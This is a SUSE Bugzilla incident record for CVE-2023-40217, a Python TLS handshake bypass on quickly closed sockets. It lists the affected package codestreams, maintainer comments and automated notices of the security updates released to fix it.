Bug 1214692 (CVE-2023-40217)

Summary:	VUL-0: CVE-2023-40217: python,python3,python39,python36,python310,python311: Bypass TLS handshake on closed sockets
Product:	[Novell Products] SUSE Security Incidents	Reporter:	Cathy Hu <cathy.hu>
Component:	Incidents	Assignee:	Security Team bot <security-team>
Status:	IN_PROGRESS ---	QA Contact:	Security Team bot <security-team>
Severity:	Major
Priority:	P3 - Medium	CC:	cxiong, daniel.garcia, mcepl, security-team
Version:	unspecified
Target Milestone:	---
Hardware:	Other
OS:	Other
URL:	https://smash.suse.de/issue/376327/
Whiteboard:	CVSSv3.1:SUSE:CVE-2023-40217:7.4:(AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)
Found By:	Security Response Team	Services Priority:
Business Priority:		Blocker:	---
Marketing QA Status:	---	IT Deployment:	---

Description Cathy Hu 2023-08-28 12:00:14 UTC

CVE-2023-40217

An issue was discovered in Python before 3.8.18, 3.9.x before 3.9.18, 3.10.x
before 3.10.13, and 3.11.x before 3.11.5. It primarily affects servers (such as
HTTP servers) that use TLS client authentication. If a TLS server-side socket is
created, receives data into the socket buffer, and then is closed quickly, there
is a brief window where the SSLSocket instance will detect the socket as "not
connected" and won't initiate a handshake, but buffered data will still be
readable from the socket buffer. This data will not be authenticated if the
server-side TLS peer is expecting client certificate authentication, and is
indistinguishable from valid TLS stream data. Data is limited in size to the
amount that will fit in the buffer. (The TLS connection cannot directly be used
for data exfiltration because the vulnerable code path requires that the
connection be closed on initialization of the SSLSocket.)

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-40217
https://www.cve.org/CVERecord?id=CVE-2023-40217
https://mail.python.org/archives/list/security-announce@python.org/thread/PEPLII27KYHLF4AK3ZQGKYNCRERG4YXY/
https://www.python.org/dev/security/

Comment 1 Cathy Hu 2023-08-28 12:01:38 UTC

All codestreams affected:
- SUSE:SLE-12-SP1:Update/python                                       2.7.18
- SUSE:SLE-12-SP1:Update/python-base                                  2.7.18
- SUSE:SLE-12-SP4:Update/python                                       2.7.18
- SUSE:SLE-12-SP4:Update/python-base                                  2.7.18
- SUSE:SLE-15:Update/python                                           2.7.18
- SUSE:SLE-15:Update/python-base                                      2.7.18
- openSUSE:Factory/python                                             2.7.18

- SUSE:SLE-12:Update/python3                                          3.4.10

- SUSE:SLE-12-SP3:Update:Products:Teradata:Update/python36  3.6.15
- SUSE:SLE-12-SP5:Update/python36                           3.6.15

- SUSE:SLE-15-SP3:Update/python39                           3.9.17
- openSUSE:Factory/python39                                 3.9.17

- SUSE:ALP:Source:Standard:1.0/python310                    3.10.10
- SUSE:SLE-15-SP4:Update/python310                          3.10.12
- openSUSE:Factory/python310                                3.10.12

- SUSE:ALP:Source:Standard:1.0/python311                    3.11.2
- SUSE:SLE-15-SP4:Update/python311                          3.11.4
- openSUSE:Factory/python311                                3.11.4

Also affected, but unsupported:
- SUSE:SLE-11-SP1:Update/python                                       2.6.9
- SUSE:SLE-11-SP1:Update/python-base                                  2.6.9

Comment 2 Daniel Garcia 2023-09-05 11:16:37 UTC

Fixed for openSUSE:Factory/python310 in factory in this request:
https://build.opensuse.org/request/show/1108911

Comment 4 OBSbugzilla Bot 2023-09-06 07:35:02 UTC

This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1109196 Factory / python38
https://build.opensuse.org/request/show/1109203 Factory / python39

Comment 5 OBSbugzilla Bot 2023-09-06 09:45:03 UTC

This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1109225 Factory / python311

Comment 8 Matej Cepl 2023-09-09 15:48:16 UTC

Isn’t this problem also for

- SUSE:SLE-15:Update/python3                                          3.6.15

???

Comment 9 Matej Cepl 2023-09-09 15:51:25 UTC

And also

- SUSE:SLE-15-SP3:Update/python3                                          3.6.15

Comment 10 Cathy Hu 2023-09-11 08:39:34 UTC

yes, matej is right

Also Affected:
- SUSE:SLE-15:Update/python3                                          3.6.15
- SUSE:SLE-15-SP3:Update/python3                                          3.6.15

Comment 13 OBSbugzilla Bot 2023-09-13 12:55:04 UTC

This is an autogenerated message for OBS integration:
This bug (1214692) was mentioned in
https://build.opensuse.org/request/show/1110909 Factory / python

Comment 15 Daniel Garcia 2023-09-14 05:34:35 UTC

There's a request created for each affected codestream with a fix for this issue.

Comment 20 Maintenance Automation 2023-09-20 16:30:01 UTC

SUSE-SU-2023:3708-1: An update that solves one vulnerability and has two security fixes can now be installed.

Category: security (important)
Bug References: 1211765, 1213463, 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python39-documentation-3.9.18-150300.4.33.1, python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
openSUSE Leap 15.5 (src): python39-documentation-3.9.18-150300.4.33.1, python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Proxy 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Retail Branch Server 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Manager Server 4.2 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1
SUSE Enterprise Storage 7.1 (src): python39-3.9.18-150300.4.33.1, python39-core-3.9.18-150300.4.33.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 21 Maintenance Automation 2023-09-22 12:30:05 UTC

SUSE-SU-2023:3731-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python36-core-3.6.15-49.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1
SUSE Linux Enterprise Server 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python36-core-3.6.15-49.1, python36-3.6.15-49.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 22 Maintenance Automation 2023-09-22 12:30:07 UTC

SUSE-SU-2023:3730-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Server 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python-2.7.18-33.23.1, python-doc-2.7.18-33.23.1, python-base-2.7.18-33.23.1
SUSE Linux Enterprise Workstation Extension 12 12-SP5 (src): python-base-2.7.18-33.23.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 23 Maintenance Automation 2023-09-27 16:30:20 UTC

SUSE-SU-2023:3804-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE CaaS Platform 4.0 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1
SUSE Linux Enterprise Micro 5.1 (src): python3-3.6.15-150000.3.135.1, python3-core-3.6.15-150000.3.135.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 24 Maintenance Automation 2023-09-27 20:31:00 UTC

SUSE-SU-2023:3828-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1, python3-documentation-3.6.15-150300.10.51.1
openSUSE Leap 15.5 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1, python3-documentation-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Basesystem Module 15-SP4 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Basesystem Module 15-SP5 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
Development Tools Module 15-SP4 (src): python3-core-3.6.15-150300.10.51.1
Development Tools Module 15-SP5 (src): python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Proxy 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Retail Branch Server 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Manager Server 4.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Enterprise Storage 7.1 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro 5.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1
SUSE Linux Enterprise Micro for Rancher 5.2 (src): python3-3.6.15-150300.10.51.1, python3-core-3.6.15-150300.10.51.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 25 Maintenance Automation 2023-09-27 20:31:20 UTC

SUSE-SU-2023:3824-1: An update that solves one vulnerability and has one security fix can now be installed.

Category: security (important)
Bug References: 1213463, 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1, python310-documentation-3.10.13-150400.4.33.1
openSUSE Leap 15.5 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1, python310-documentation-3.10.13-150400.4.33.1
Python 3 Module 15-SP4 (src): python310-core-3.10.13-150400.4.33.1, python310-3.10.13-150400.4.33.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 28 Maintenance Automation 2023-10-02 08:30:19 UTC

SUSE-SU-2023:3933-1: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
openSUSE Leap 15.4 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1, python-doc-2.7.18-150000.54.1
openSUSE Leap 15.5 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1, python-doc-2.7.18-150000.54.1
SUSE Package Hub 15 15-SP4 (src): python-base-2.7.18-150000.54.1
SUSE Package Hub 15 15-SP5 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing 15 SP1 LTSS 15-SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing 15 SP2 LTSS 15-SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing ESPOS 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP1 LTSS 15-SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP2 LTSS 15-SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Proxy 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Retail Branch Server 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Manager Server 4.2 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE Enterprise Storage 7.1 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1
SUSE CaaS Platform 4.0 (src): python-base-2.7.18-150000.54.1, python-2.7.18-150000.54.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 29 Maintenance Automation 2023-10-03 12:30:01 UTC

SUSE-SU-2023:3939-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1214693
CVE References: CVE-2023-40217, CVE-2023-41105
Sources used:
Web and Scripting Module 12 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Server 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python3-3.4.10-25.116.1, python3-base-3.4.10-25.116.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 30 Maintenance Automation 2023-10-03 20:30:50 UTC

SUSE-SU-2023:3943-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1214693
CVE References: CVE-2023-40217, CVE-2023-41105
Sources used:
openSUSE Leap 15.4 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
openSUSE Leap 15.5 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
Python 3 Module 15-SP4 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2
Python 3 Module 15-SP5 (src): python311-documentation-3.11.5-150400.9.20.2, python311-3.11.5-150400.9.20.1, python311-core-3.11.5-150400.9.20.2

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 33 Maintenance Automation 2023-10-19 12:30:06 UTC

SUSE-SU-2023:3828-2: An update that solves one vulnerability can now be installed.

Category: security (important)
Bug References: 1214692
CVE References: CVE-2023-40217
Sources used:
SUSE Linux Enterprise Micro 5.5 (src): python3-core-3.6.15-150300.10.51.1, python3-3.6.15-150300.10.51.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 39 Maintenance Automation 2024-03-06 20:30:02 UTC

SUSE-SU-2024:0785-1: An update that solves two vulnerabilities can now be installed.

Category: security (important)
Bug References: 1214692, 1219666
CVE References: CVE-2023-40217, CVE-2023-6597
Sources used:
Web and Scripting Module 12 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Software Development Kit 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise High Performance Computing 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Server 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1
SUSE Linux Enterprise Server for SAP Applications 12 SP5 (src): python3-3.4.10-25.124.1, python3-base-3.4.10-25.124.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.

Comment 40 Maintenance Automation 2024-03-06 20:30:05 UTC

SUSE-SU-2024:0784-1: An update that solves four vulnerabilities, contains two features and has two security fixes can now be installed.

Category: security (important)
Bug References: 1196025, 1210638, 1212015, 1214692, 1215454, 1219666
CVE References: CVE-2022-25236, CVE-2023-27043, CVE-2023-40217, CVE-2023-6597
Jira References: PED-7886, SLE-21253
Sources used:
openSUSE Leap 15.3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1, python39-documentation-3.9.18-150300.4.38.1
openSUSE Leap 15.5 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1, python39-documentation-3.9.18-150300.4.38.1
SUSE Linux Enterprise High Performance Computing LTSS 15 SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Linux Enterprise Server 15 SP3 LTSS 15-SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Linux Enterprise Server for SAP Applications 15 SP3 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1
SUSE Enterprise Storage 7.1 (src): python39-3.9.18-150300.4.38.1, python39-core-3.9.18-150300.4.38.1

NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.